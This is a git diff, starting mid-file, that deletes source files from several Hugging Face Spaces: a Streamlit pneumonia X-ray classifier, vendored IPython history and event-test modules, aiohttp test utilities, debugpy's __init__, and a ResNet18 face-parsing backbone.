num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=y.dtype, device=y.device) - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - - return spec diff --git 
a/spaces/Spectrez/Chest-Lung-Identification/app.py b/spaces/Spectrez/Chest-Lung-Identification/app.py deleted file mode 100644 index 0da7294ff35bace59405f7e14d9bab2df67c0548..0000000000000000000000000000000000000000 --- a/spaces/Spectrez/Chest-Lung-Identification/app.py +++ /dev/null @@ -1,53 +0,0 @@ -import streamlit as st -import tensorflow as tf -from PIL import Image -import cv2 as cv -import numpy as np - - -model = tf.keras.models.load_model("LUNG-AI-5.h5") -st.title("AI Lung Prediction") -img = st.file_uploader("Upload a Chest X-ray", type=["jpg", "png"], accept_multiple_files=False, label_visibility="visible") -# st.write(print(img)) - -class_names = [ - 'Normal', - 'Pneumonia' -] - - -if img != None: - st.image(img, width=300) - img = Image.open(img) - img = img.convert('RGB') - # image_preprocess.load() # required for png.split() - # img = Image.new("RGB", image_preprocess.size, (255, 255, 255)) - # img.paste(image_preprocess, mask=image_preprocess.split()[3]) # 3 is the alpha channel - -else: - st.header("Please Upload a Lung X-ray") - - - -img = cv.resize(np.asarray(img), (100, 100)) -# if img != None: -image_p = [] -image_p.append(cv.resize(img, (100, 100))) -image_p = np.asanyarray(image_p) - -image_p = image_p / 255.0 - -probability_model = tf.keras.Sequential([ - model, - tf.keras.layers.Softmax() -]) - - -predictions = probability_model.predict(image_p) -image_class_predict = np.argmax(predictions) - - -if image_class_predict == 0: - st.subheader("Normal Lung") -elif image_class_predict == 1: - st.subheader("Pneumonia Lung") diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/historyapp.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/historyapp.py deleted file mode 100644 index 01a55343f8a51f59b77da952a6e71088e0c4debf..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/historyapp.py +++ /dev/null @@ -1,161 +0,0 @@ -# encoding: utf-8 -""" -An application for managing IPython history. - -To be invoked as the `ipython history` subcommand. -""" - -import sqlite3 -from pathlib import Path - -from traitlets.config.application import Application -from .application import BaseIPythonApplication -from traitlets import Bool, Int, Dict -from ..utils.io import ask_yes_no - -trim_hist_help = """Trim the IPython history database to the last 1000 entries. - -This actually copies the last 1000 entries to a new database, and then replaces -the old file with the new. Use the `--keep=` argument to specify a number -other than 1000. -""" - -clear_hist_help = """Clear the IPython history database, deleting all entries. - -Because this is a destructive operation, IPython will prompt the user if they -really want to do this. Passing a `-f` flag will force clearing without a -prompt. - -This is an handy alias to `ipython history trim --keep=0` -""" - - -class HistoryTrim(BaseIPythonApplication): - description = trim_hist_help - - backup = Bool(False, - help="Keep the old history file as history.sqlite." - ).tag(config=True) - - keep = Int(1000, - help="Number of recent lines to keep in the database." - ).tag(config=True) - - flags = Dict(dict( - backup = ({'HistoryTrim' : {'backup' : True}}, - backup.help - ) - )) - - aliases=Dict(dict( - keep = 'HistoryTrim.keep' - )) - - def start(self): - profile_dir = Path(self.profile_dir.location) - hist_file = profile_dir / "history.sqlite" - con = sqlite3.connect(hist_file) - - # Grab the recent history from the current database. 
- inputs = list(con.execute('SELECT session, line, source, source_raw FROM ' - 'history ORDER BY session DESC, line DESC LIMIT ?', (self.keep+1,))) - if len(inputs) <= self.keep: - print("There are already at most %d entries in the history database." % self.keep) - print("Not doing anything. Use --keep= argument to keep fewer entries") - return - - print("Trimming history to the most recent %d entries." % self.keep) - - inputs.pop() # Remove the extra element we got to check the length. - inputs.reverse() - if inputs: - first_session = inputs[0][0] - outputs = list(con.execute('SELECT session, line, output FROM ' - 'output_history WHERE session >= ?', (first_session,))) - sessions = list(con.execute('SELECT session, start, end, num_cmds, remark FROM ' - 'sessions WHERE session >= ?', (first_session,))) - con.close() - - # Create the new history database. - new_hist_file = profile_dir / "history.sqlite.new" - i = 0 - while new_hist_file.exists(): - # Make sure we don't interfere with an existing file. - i += 1 - new_hist_file = profile_dir / ("history.sqlite.new" + str(i)) - new_db = sqlite3.connect(new_hist_file) - new_db.execute("""CREATE TABLE IF NOT EXISTS sessions (session integer - primary key autoincrement, start timestamp, - end timestamp, num_cmds integer, remark text)""") - new_db.execute("""CREATE TABLE IF NOT EXISTS history - (session integer, line integer, source text, source_raw text, - PRIMARY KEY (session, line))""") - new_db.execute("""CREATE TABLE IF NOT EXISTS output_history - (session integer, line integer, output text, - PRIMARY KEY (session, line))""") - new_db.commit() - - - if inputs: - with new_db: - # Add the recent history into the new database. - new_db.executemany('insert into sessions values (?,?,?,?,?)', sessions) - new_db.executemany('insert into history values (?,?,?,?)', inputs) - new_db.executemany('insert into output_history values (?,?,?)', outputs) - new_db.close() - - if self.backup: - i = 1 - backup_hist_file = profile_dir / ("history.sqlite.old.%d" % i) - while backup_hist_file.exists(): - i += 1 - backup_hist_file = profile_dir / ("history.sqlite.old.%d" % i) - hist_file.rename(backup_hist_file) - print("Backed up longer history file to", backup_hist_file) - else: - hist_file.unlink() - - new_hist_file.rename(hist_file) - -class HistoryClear(HistoryTrim): - description = clear_hist_help - keep = Int(0, - help="Number of recent lines to keep in the database.") - - force = Bool(False, - help="Don't prompt user for confirmation" - ).tag(config=True) - - flags = Dict(dict( - force = ({'HistoryClear' : {'force' : True}}, - force.help), - f = ({'HistoryTrim' : {'force' : True}}, - force.help - ) - )) - aliases = Dict() - - def start(self): - if self.force or ask_yes_no("Really delete all ipython history? ", - default="no", interrupt="no"): - HistoryTrim.start(self) - -class HistoryApp(Application): - name = u'ipython-history' - description = "Manage the IPython history database." - - subcommands = Dict(dict( - trim = (HistoryTrim, HistoryTrim.description.splitlines()[0]), - clear = (HistoryClear, HistoryClear.description.splitlines()[0]), - )) - - def start(self): - if self.subapp is None: - print("No subcommand specified. 
Must specify one of: %s" % \ - (self.subcommands.keys())) - print() - self.print_description() - self.print_subcommands() - self.exit(1) - else: - return self.subapp.start() diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/tests/test_events.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/tests/test_events.py deleted file mode 100644 index cc9bf40fd6dc42e48e93ecce71c714706613afd3..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/tests/test_events.py +++ /dev/null @@ -1,91 +0,0 @@ -import unittest -from unittest.mock import Mock - -from IPython.core import events -import IPython.testing.tools as tt - - -@events._define_event -def ping_received(): - pass - - -@events._define_event -def event_with_argument(argument): - pass - - -class CallbackTests(unittest.TestCase): - def setUp(self): - self.em = events.EventManager(get_ipython(), - {'ping_received': ping_received, - 'event_with_argument': event_with_argument}) - - def test_register_unregister(self): - cb = Mock() - - self.em.register('ping_received', cb) - self.em.trigger('ping_received') - self.assertEqual(cb.call_count, 1) - - self.em.unregister('ping_received', cb) - self.em.trigger('ping_received') - self.assertEqual(cb.call_count, 1) - - def test_bare_function_missed_unregister(self): - def cb1(): - ... - - def cb2(): - ... - - self.em.register("ping_received", cb1) - self.assertRaises(ValueError, self.em.unregister, "ping_received", cb2) - self.em.unregister("ping_received", cb1) - - def test_cb_error(self): - cb = Mock(side_effect=ValueError) - self.em.register('ping_received', cb) - with tt.AssertPrints("Error in callback"): - self.em.trigger('ping_received') - - def test_cb_keyboard_interrupt(self): - cb = Mock(side_effect=KeyboardInterrupt) - self.em.register('ping_received', cb) - with tt.AssertPrints("Error in callback"): - self.em.trigger('ping_received') - - def test_unregister_during_callback(self): - invoked = [False] * 3 - - def func1(*_): - invoked[0] = True - self.em.unregister('ping_received', func1) - self.em.register('ping_received', func3) - - def func2(*_): - invoked[1] = True - self.em.unregister('ping_received', func2) - - def func3(*_): - invoked[2] = True - - self.em.register('ping_received', func1) - self.em.register('ping_received', func2) - - self.em.trigger('ping_received') - self.assertEqual([True, True, False], invoked) - self.assertEqual([func3], self.em.callbacks['ping_received']) - - def test_ignore_event_arguments_if_no_argument_required(self): - call_count = [0] - def event_with_no_argument(): - call_count[0] += 1 - - self.em.register('event_with_argument', event_with_no_argument) - self.em.trigger('event_with_argument', 'the argument') - self.assertEqual(call_count[0], 1) - - self.em.unregister('event_with_argument', event_with_no_argument) - self.em.trigger('ping_received') - self.assertEqual(call_count[0], 1) diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/aiohttp/test_utils.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/aiohttp/test_utils.py deleted file mode 100644 index fcda2f3ddc045a381470012ba331c75299af4981..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/aiohttp/test_utils.py +++ /dev/null @@ -1,706 +0,0 @@ -"""Utilities shared by tests.""" - -import asyncio -import contextlib -import gc -import inspect -import ipaddress -import os -import socket -import sys -import warnings -from 
abc import ABC, abstractmethod -from types import TracebackType -from typing import ( - TYPE_CHECKING, - Any, - Callable, - Iterator, - List, - Optional, - Type, - Union, - cast, -) -from unittest import mock - -from aiosignal import Signal -from multidict import CIMultiDict, CIMultiDictProxy -from yarl import URL - -import aiohttp -from aiohttp.client import _RequestContextManager, _WSRequestContextManager - -from . import ClientSession, hdrs -from .abc import AbstractCookieJar -from .client_reqrep import ClientResponse -from .client_ws import ClientWebSocketResponse -from .helpers import PY_38, sentinel -from .http import HttpVersion, RawRequestMessage -from .web import ( - Application, - AppRunner, - BaseRunner, - Request, - Server, - ServerRunner, - SockSite, - UrlMappingMatchInfo, -) -from .web_protocol import _RequestHandler - -if TYPE_CHECKING: # pragma: no cover - from ssl import SSLContext -else: - SSLContext = None - -if PY_38: - from unittest import IsolatedAsyncioTestCase as TestCase -else: - from asynctest import TestCase # type: ignore[no-redef] - -REUSE_ADDRESS = os.name == "posix" and sys.platform != "cygwin" - - -def get_unused_port_socket( - host: str, family: socket.AddressFamily = socket.AF_INET -) -> socket.socket: - return get_port_socket(host, 0, family) - - -def get_port_socket( - host: str, port: int, family: socket.AddressFamily -) -> socket.socket: - s = socket.socket(family, socket.SOCK_STREAM) - if REUSE_ADDRESS: - # Windows has different semantics for SO_REUSEADDR, - # so don't set it. Ref: - # https://docs.microsoft.com/en-us/windows/win32/winsock/using-so-reuseaddr-and-so-exclusiveaddruse - s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - s.bind((host, port)) - return s - - -def unused_port() -> int: - """Return a port that is unused on the current host.""" - with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: - s.bind(("127.0.0.1", 0)) - return cast(int, s.getsockname()[1]) - - -class BaseTestServer(ABC): - __test__ = False - - def __init__( - self, - *, - scheme: Union[str, object] = sentinel, - loop: Optional[asyncio.AbstractEventLoop] = None, - host: str = "127.0.0.1", - port: Optional[int] = None, - skip_url_asserts: bool = False, - socket_factory: Callable[ - [str, int, socket.AddressFamily], socket.socket - ] = get_port_socket, - **kwargs: Any, - ) -> None: - self._loop = loop - self.runner: Optional[BaseRunner] = None - self._root: Optional[URL] = None - self.host = host - self.port = port - self._closed = False - self.scheme = scheme - self.skip_url_asserts = skip_url_asserts - self.socket_factory = socket_factory - - async def start_server( - self, loop: Optional[asyncio.AbstractEventLoop] = None, **kwargs: Any - ) -> None: - if self.runner: - return - self._loop = loop - self._ssl = kwargs.pop("ssl", None) - self.runner = await self._make_runner(**kwargs) - await self.runner.setup() - if not self.port: - self.port = 0 - try: - version = ipaddress.ip_address(self.host).version - except ValueError: - version = 4 - family = socket.AF_INET6 if version == 6 else socket.AF_INET - _sock = self.socket_factory(self.host, self.port, family) - self.host, self.port = _sock.getsockname()[:2] - site = SockSite(self.runner, sock=_sock, ssl_context=self._ssl) - await site.start() - server = site._server - assert server is not None - sockets = server.sockets - assert sockets is not None - self.port = sockets[0].getsockname()[1] - if self.scheme is sentinel: - if self._ssl: - scheme = "https" - else: - scheme = "http" - self.scheme = scheme - 
self._root = URL(f"{self.scheme}://{self.host}:{self.port}") - - @abstractmethod # pragma: no cover - async def _make_runner(self, **kwargs: Any) -> BaseRunner: - pass - - def make_url(self, path: str) -> URL: - assert self._root is not None - url = URL(path) - if not self.skip_url_asserts: - assert not url.is_absolute() - return self._root.join(url) - else: - return URL(str(self._root) + path) - - @property - def started(self) -> bool: - return self.runner is not None - - @property - def closed(self) -> bool: - return self._closed - - @property - def handler(self) -> Server: - # for backward compatibility - # web.Server instance - runner = self.runner - assert runner is not None - assert runner.server is not None - return runner.server - - async def close(self) -> None: - """Close all fixtures created by the test client. - - After that point, the TestClient is no longer usable. - - This is an idempotent function: running close multiple times - will not have any additional effects. - - close is also run when the object is garbage collected, and on - exit when used as a context manager. - - """ - if self.started and not self.closed: - assert self.runner is not None - await self.runner.cleanup() - self._root = None - self.port = None - self._closed = True - - def __enter__(self) -> None: - raise TypeError("Use async with instead") - - def __exit__( - self, - exc_type: Optional[Type[BaseException]], - exc_value: Optional[BaseException], - traceback: Optional[TracebackType], - ) -> None: - # __exit__ should exist in pair with __enter__ but never executed - pass # pragma: no cover - - async def __aenter__(self) -> "BaseTestServer": - await self.start_server(loop=self._loop) - return self - - async def __aexit__( - self, - exc_type: Optional[Type[BaseException]], - exc_value: Optional[BaseException], - traceback: Optional[TracebackType], - ) -> None: - await self.close() - - -class TestServer(BaseTestServer): - def __init__( - self, - app: Application, - *, - scheme: Union[str, object] = sentinel, - host: str = "127.0.0.1", - port: Optional[int] = None, - **kwargs: Any, - ): - self.app = app - super().__init__(scheme=scheme, host=host, port=port, **kwargs) - - async def _make_runner(self, **kwargs: Any) -> BaseRunner: - return AppRunner(self.app, **kwargs) - - -class RawTestServer(BaseTestServer): - def __init__( - self, - handler: _RequestHandler, - *, - scheme: Union[str, object] = sentinel, - host: str = "127.0.0.1", - port: Optional[int] = None, - **kwargs: Any, - ) -> None: - self._handler = handler - super().__init__(scheme=scheme, host=host, port=port, **kwargs) - - async def _make_runner(self, debug: bool = True, **kwargs: Any) -> ServerRunner: - srv = Server(self._handler, loop=self._loop, debug=debug, **kwargs) - return ServerRunner(srv, debug=debug, **kwargs) - - -class TestClient: - """ - A test client implementation. - - To write functional tests for aiohttp based servers. 
- - """ - - __test__ = False - - def __init__( - self, - server: BaseTestServer, - *, - cookie_jar: Optional[AbstractCookieJar] = None, - loop: Optional[asyncio.AbstractEventLoop] = None, - **kwargs: Any, - ) -> None: - if not isinstance(server, BaseTestServer): - raise TypeError( - "server must be TestServer " "instance, found type: %r" % type(server) - ) - self._server = server - self._loop = loop - if cookie_jar is None: - cookie_jar = aiohttp.CookieJar(unsafe=True, loop=loop) - self._session = ClientSession(loop=loop, cookie_jar=cookie_jar, **kwargs) - self._closed = False - self._responses: List[ClientResponse] = [] - self._websockets: List[ClientWebSocketResponse] = [] - - async def start_server(self) -> None: - await self._server.start_server(loop=self._loop) - - @property - def host(self) -> str: - return self._server.host - - @property - def port(self) -> Optional[int]: - return self._server.port - - @property - def server(self) -> BaseTestServer: - return self._server - - @property - def app(self) -> Optional[Application]: - return cast(Optional[Application], getattr(self._server, "app", None)) - - @property - def session(self) -> ClientSession: - """An internal aiohttp.ClientSession. - - Unlike the methods on the TestClient, client session requests - do not automatically include the host in the url queried, and - will require an absolute path to the resource. - - """ - return self._session - - def make_url(self, path: str) -> URL: - return self._server.make_url(path) - - async def _request(self, method: str, path: str, **kwargs: Any) -> ClientResponse: - resp = await self._session.request(method, self.make_url(path), **kwargs) - # save it to close later - self._responses.append(resp) - return resp - - def request(self, method: str, path: str, **kwargs: Any) -> _RequestContextManager: - """Routes a request to tested http server. - - The interface is identical to aiohttp.ClientSession.request, - except the loop kwarg is overridden by the instance used by the - test server. - - """ - return _RequestContextManager(self._request(method, path, **kwargs)) - - def get(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP GET request.""" - return _RequestContextManager(self._request(hdrs.METH_GET, path, **kwargs)) - - def post(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP POST request.""" - return _RequestContextManager(self._request(hdrs.METH_POST, path, **kwargs)) - - def options(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP OPTIONS request.""" - return _RequestContextManager(self._request(hdrs.METH_OPTIONS, path, **kwargs)) - - def head(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP HEAD request.""" - return _RequestContextManager(self._request(hdrs.METH_HEAD, path, **kwargs)) - - def put(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP PUT request.""" - return _RequestContextManager(self._request(hdrs.METH_PUT, path, **kwargs)) - - def patch(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP PATCH request.""" - return _RequestContextManager(self._request(hdrs.METH_PATCH, path, **kwargs)) - - def delete(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP PATCH request.""" - return _RequestContextManager(self._request(hdrs.METH_DELETE, path, **kwargs)) - - def ws_connect(self, path: str, **kwargs: Any) -> _WSRequestContextManager: - """Initiate websocket connection. 
- - The api corresponds to aiohttp.ClientSession.ws_connect. - - """ - return _WSRequestContextManager(self._ws_connect(path, **kwargs)) - - async def _ws_connect(self, path: str, **kwargs: Any) -> ClientWebSocketResponse: - ws = await self._session.ws_connect(self.make_url(path), **kwargs) - self._websockets.append(ws) - return ws - - async def close(self) -> None: - """Close all fixtures created by the test client. - - After that point, the TestClient is no longer usable. - - This is an idempotent function: running close multiple times - will not have any additional effects. - - close is also run on exit when used as a(n) (asynchronous) - context manager. - - """ - if not self._closed: - for resp in self._responses: - resp.close() - for ws in self._websockets: - await ws.close() - await self._session.close() - await self._server.close() - self._closed = True - - def __enter__(self) -> None: - raise TypeError("Use async with instead") - - def __exit__( - self, - exc_type: Optional[Type[BaseException]], - exc: Optional[BaseException], - tb: Optional[TracebackType], - ) -> None: - # __exit__ should exist in pair with __enter__ but never executed - pass # pragma: no cover - - async def __aenter__(self) -> "TestClient": - await self.start_server() - return self - - async def __aexit__( - self, - exc_type: Optional[Type[BaseException]], - exc: Optional[BaseException], - tb: Optional[TracebackType], - ) -> None: - await self.close() - - -class AioHTTPTestCase(TestCase): - """A base class to allow for unittest web applications using aiohttp. - - Provides the following: - - * self.client (aiohttp.test_utils.TestClient): an aiohttp test client. - * self.loop (asyncio.BaseEventLoop): the event loop in which the - application and server are running. - * self.app (aiohttp.web.Application): the application returned by - self.get_application() - - Note that the TestClient's methods are asynchronous: you have to - execute function on the test client using asynchronous methods. - """ - - async def get_application(self) -> Application: - """Get application. - - This method should be overridden - to return the aiohttp.web.Application - object to test. - """ - return self.get_app() - - def get_app(self) -> Application: - """Obsolete method used to constructing web application. - - Use .get_application() coroutine instead. 
- """ - raise RuntimeError("Did you forget to define get_application()?") - - def setUp(self) -> None: - if not PY_38: - asyncio.get_event_loop().run_until_complete(self.asyncSetUp()) - - async def asyncSetUp(self) -> None: - try: - self.loop = asyncio.get_running_loop() - except (AttributeError, RuntimeError): # AttributeError->py36 - self.loop = asyncio.get_event_loop_policy().get_event_loop() - - return await self.setUpAsync() - - async def setUpAsync(self) -> None: - self.app = await self.get_application() - self.server = await self.get_server(self.app) - self.client = await self.get_client(self.server) - - await self.client.start_server() - - def tearDown(self) -> None: - if not PY_38: - self.loop.run_until_complete(self.asyncTearDown()) - - async def asyncTearDown(self) -> None: - return await self.tearDownAsync() - - async def tearDownAsync(self) -> None: - await self.client.close() - - async def get_server(self, app: Application) -> TestServer: - """Return a TestServer instance.""" - return TestServer(app, loop=self.loop) - - async def get_client(self, server: TestServer) -> TestClient: - """Return a TestClient instance.""" - return TestClient(server, loop=self.loop) - - -def unittest_run_loop(func: Any, *args: Any, **kwargs: Any) -> Any: - """ - A decorator dedicated to use with asynchronous AioHTTPTestCase test methods. - - In 3.8+, this does nothing. - """ - warnings.warn( - "Decorator `@unittest_run_loop` is no longer needed in aiohttp 3.8+", - DeprecationWarning, - stacklevel=2, - ) - return func - - -_LOOP_FACTORY = Callable[[], asyncio.AbstractEventLoop] - - -@contextlib.contextmanager -def loop_context( - loop_factory: _LOOP_FACTORY = asyncio.new_event_loop, fast: bool = False -) -> Iterator[asyncio.AbstractEventLoop]: - """A contextmanager that creates an event_loop, for test purposes. - - Handles the creation and cleanup of a test loop. - """ - loop = setup_test_loop(loop_factory) - yield loop - teardown_test_loop(loop, fast=fast) - - -def setup_test_loop( - loop_factory: _LOOP_FACTORY = asyncio.new_event_loop, -) -> asyncio.AbstractEventLoop: - """Create and return an asyncio.BaseEventLoop instance. - - The caller should also call teardown_test_loop, - once they are done with the loop. 
- """ - loop = loop_factory() - try: - module = loop.__class__.__module__ - skip_watcher = "uvloop" in module - except AttributeError: # pragma: no cover - # Just in case - skip_watcher = True - asyncio.set_event_loop(loop) - if sys.platform != "win32" and not skip_watcher: - policy = asyncio.get_event_loop_policy() - watcher: asyncio.AbstractChildWatcher - try: # Python >= 3.8 - # Refs: - # * https://github.com/pytest-dev/pytest-xdist/issues/620 - # * https://stackoverflow.com/a/58614689/595220 - # * https://bugs.python.org/issue35621 - # * https://github.com/python/cpython/pull/14344 - watcher = asyncio.ThreadedChildWatcher() - except AttributeError: # Python < 3.8 - watcher = asyncio.SafeChildWatcher() - watcher.attach_loop(loop) - with contextlib.suppress(NotImplementedError): - policy.set_child_watcher(watcher) - return loop - - -def teardown_test_loop(loop: asyncio.AbstractEventLoop, fast: bool = False) -> None: - """Teardown and cleanup an event_loop created by setup_test_loop.""" - closed = loop.is_closed() - if not closed: - loop.call_soon(loop.stop) - loop.run_forever() - loop.close() - - if not fast: - gc.collect() - - asyncio.set_event_loop(None) - - -def _create_app_mock() -> mock.MagicMock: - def get_dict(app: Any, key: str) -> Any: - return app.__app_dict[key] - - def set_dict(app: Any, key: str, value: Any) -> None: - app.__app_dict[key] = value - - app = mock.MagicMock(spec=Application) - app.__app_dict = {} - app.__getitem__ = get_dict - app.__setitem__ = set_dict - - app._debug = False - app.on_response_prepare = Signal(app) - app.on_response_prepare.freeze() - return app - - -def _create_transport(sslcontext: Optional[SSLContext] = None) -> mock.Mock: - transport = mock.Mock() - - def get_extra_info(key: str) -> Optional[SSLContext]: - if key == "sslcontext": - return sslcontext - else: - return None - - transport.get_extra_info.side_effect = get_extra_info - return transport - - -def make_mocked_request( - method: str, - path: str, - headers: Any = None, - *, - match_info: Any = sentinel, - version: HttpVersion = HttpVersion(1, 1), - closing: bool = False, - app: Any = None, - writer: Any = sentinel, - protocol: Any = sentinel, - transport: Any = sentinel, - payload: Any = sentinel, - sslcontext: Optional[SSLContext] = None, - client_max_size: int = 1024**2, - loop: Any = ..., -) -> Request: - """Creates mocked web.Request testing purposes. - - Useful in unit tests, when spinning full web server is overkill or - specific conditions and errors are hard to trigger. 
- """ - task = mock.Mock() - if loop is ...: - loop = mock.Mock() - loop.create_future.return_value = () - - if version < HttpVersion(1, 1): - closing = True - - if headers: - headers = CIMultiDictProxy(CIMultiDict(headers)) - raw_hdrs = tuple( - (k.encode("utf-8"), v.encode("utf-8")) for k, v in headers.items() - ) - else: - headers = CIMultiDictProxy(CIMultiDict()) - raw_hdrs = () - - chunked = "chunked" in headers.get(hdrs.TRANSFER_ENCODING, "").lower() - - message = RawRequestMessage( - method, - path, - version, - headers, - raw_hdrs, - closing, - None, - False, - chunked, - URL(path), - ) - if app is None: - app = _create_app_mock() - - if transport is sentinel: - transport = _create_transport(sslcontext) - - if protocol is sentinel: - protocol = mock.Mock() - protocol.transport = transport - - if writer is sentinel: - writer = mock.Mock() - writer.write_headers = make_mocked_coro(None) - writer.write = make_mocked_coro(None) - writer.write_eof = make_mocked_coro(None) - writer.drain = make_mocked_coro(None) - writer.transport = transport - - protocol.transport = transport - protocol.writer = writer - - if payload is sentinel: - payload = mock.Mock() - - req = Request( - message, payload, protocol, writer, task, loop, client_max_size=client_max_size - ) - - match_info = UrlMappingMatchInfo( - {} if match_info is sentinel else match_info, mock.Mock() - ) - match_info.add_app(app) - req._match_info = match_info - - return req - - -def make_mocked_coro( - return_value: Any = sentinel, raise_exception: Any = sentinel -) -> Any: - """Creates a coroutine mock.""" - - async def mock_coro(*args: Any, **kwargs: Any) -> Any: - if raise_exception is not sentinel: - raise raise_exception - if not inspect.isawaitable(return_value): - return return_value - await return_value - - return mock.Mock(wraps=mock_coro) diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/debugpy/__init__.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/debugpy/__init__.py deleted file mode 100644 index 975bec79b9f6bb55393b0931ca3a3dc50cc4ae54..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/debugpy/__init__.py +++ /dev/null @@ -1,38 +0,0 @@ -# Copyright (c) Microsoft Corporation. All rights reserved. -# Licensed under the MIT License. See LICENSE in the project root -# for license information. - -"""An implementation of the Debug Adapter Protocol (DAP) for Python. - -https://microsoft.github.io/debug-adapter-protocol/ -""" - -# debugpy stable public API consists solely of members of this module that are -# enumerated below. -__all__ = [ # noqa - "__version__", - "breakpoint", - "configure", - "connect", - "debug_this_thread", - "is_client_connected", - "listen", - "log_to", - "trace_this_thread", - "wait_for_client", -] - -import sys - -assert sys.version_info >= (3, 7), ( - "Python 3.6 and below is not supported by this version of debugpy; " - "use debugpy 1.5.1 or earlier." -) - - -# Actual definitions are in a separate file to work around parsing issues causing -# SyntaxError on Python 2 and preventing the above version check from executing. 
-from debugpy.public_api import * # noqa -from debugpy.public_api import __version__ - -del sys diff --git a/spaces/Suniilkumaar/SwapMukham/face_parsing/resnet.py b/spaces/Suniilkumaar/SwapMukham/face_parsing/resnet.py deleted file mode 100644 index aa2bf95130e9815ba378cb6f73207068b81a04b9..0000000000000000000000000000000000000000 --- a/spaces/Suniilkumaar/SwapMukham/face_parsing/resnet.py +++ /dev/null @@ -1,109 +0,0 @@ -#!/usr/bin/python -# -*- encoding: utf-8 -*- - -import torch -import torch.nn as nn -import torch.nn.functional as F -import torch.utils.model_zoo as modelzoo - -# from modules.bn import InPlaceABNSync as BatchNorm2d - -resnet18_url = 'https://download.pytorch.org/models/resnet18-5c106cde.pth' - - -def conv3x3(in_planes, out_planes, stride=1): - """3x3 convolution with padding""" - return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, - padding=1, bias=False) - - -class BasicBlock(nn.Module): - def __init__(self, in_chan, out_chan, stride=1): - super(BasicBlock, self).__init__() - self.conv1 = conv3x3(in_chan, out_chan, stride) - self.bn1 = nn.BatchNorm2d(out_chan) - self.conv2 = conv3x3(out_chan, out_chan) - self.bn2 = nn.BatchNorm2d(out_chan) - self.relu = nn.ReLU(inplace=True) - self.downsample = None - if in_chan != out_chan or stride != 1: - self.downsample = nn.Sequential( - nn.Conv2d(in_chan, out_chan, - kernel_size=1, stride=stride, bias=False), - nn.BatchNorm2d(out_chan), - ) - - def forward(self, x): - residual = self.conv1(x) - residual = F.relu(self.bn1(residual)) - residual = self.conv2(residual) - residual = self.bn2(residual) - - shortcut = x - if self.downsample is not None: - shortcut = self.downsample(x) - - out = shortcut + residual - out = self.relu(out) - return out - - -def create_layer_basic(in_chan, out_chan, bnum, stride=1): - layers = [BasicBlock(in_chan, out_chan, stride=stride)] - for i in range(bnum-1): - layers.append(BasicBlock(out_chan, out_chan, stride=1)) - return nn.Sequential(*layers) - - -class Resnet18(nn.Module): - def __init__(self): - super(Resnet18, self).__init__() - self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, - bias=False) - self.bn1 = nn.BatchNorm2d(64) - self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1) - self.layer1 = create_layer_basic(64, 64, bnum=2, stride=1) - self.layer2 = create_layer_basic(64, 128, bnum=2, stride=2) - self.layer3 = create_layer_basic(128, 256, bnum=2, stride=2) - self.layer4 = create_layer_basic(256, 512, bnum=2, stride=2) - self.init_weight() - - def forward(self, x): - x = self.conv1(x) - x = F.relu(self.bn1(x)) - x = self.maxpool(x) - - x = self.layer1(x) - feat8 = self.layer2(x) # 1/8 - feat16 = self.layer3(feat8) # 1/16 - feat32 = self.layer4(feat16) # 1/32 - return feat8, feat16, feat32 - - def init_weight(self): - state_dict = modelzoo.load_url(resnet18_url) - self_state_dict = self.state_dict() - for k, v in state_dict.items(): - if 'fc' in k: continue - self_state_dict.update({k: v}) - self.load_state_dict(self_state_dict) - - def get_params(self): - wd_params, nowd_params = [], [] - for name, module in self.named_modules(): - if isinstance(module, (nn.Linear, nn.Conv2d)): - wd_params.append(module.weight) - if not module.bias is None: - nowd_params.append(module.bias) - elif isinstance(module, nn.BatchNorm2d): - nowd_params += list(module.parameters()) - return wd_params, nowd_params - - -if __name__ == "__main__": - net = Resnet18() - x = torch.randn(16, 3, 224, 224) - out = net(x) - print(out[0].size()) - print(out[1].size()) - 
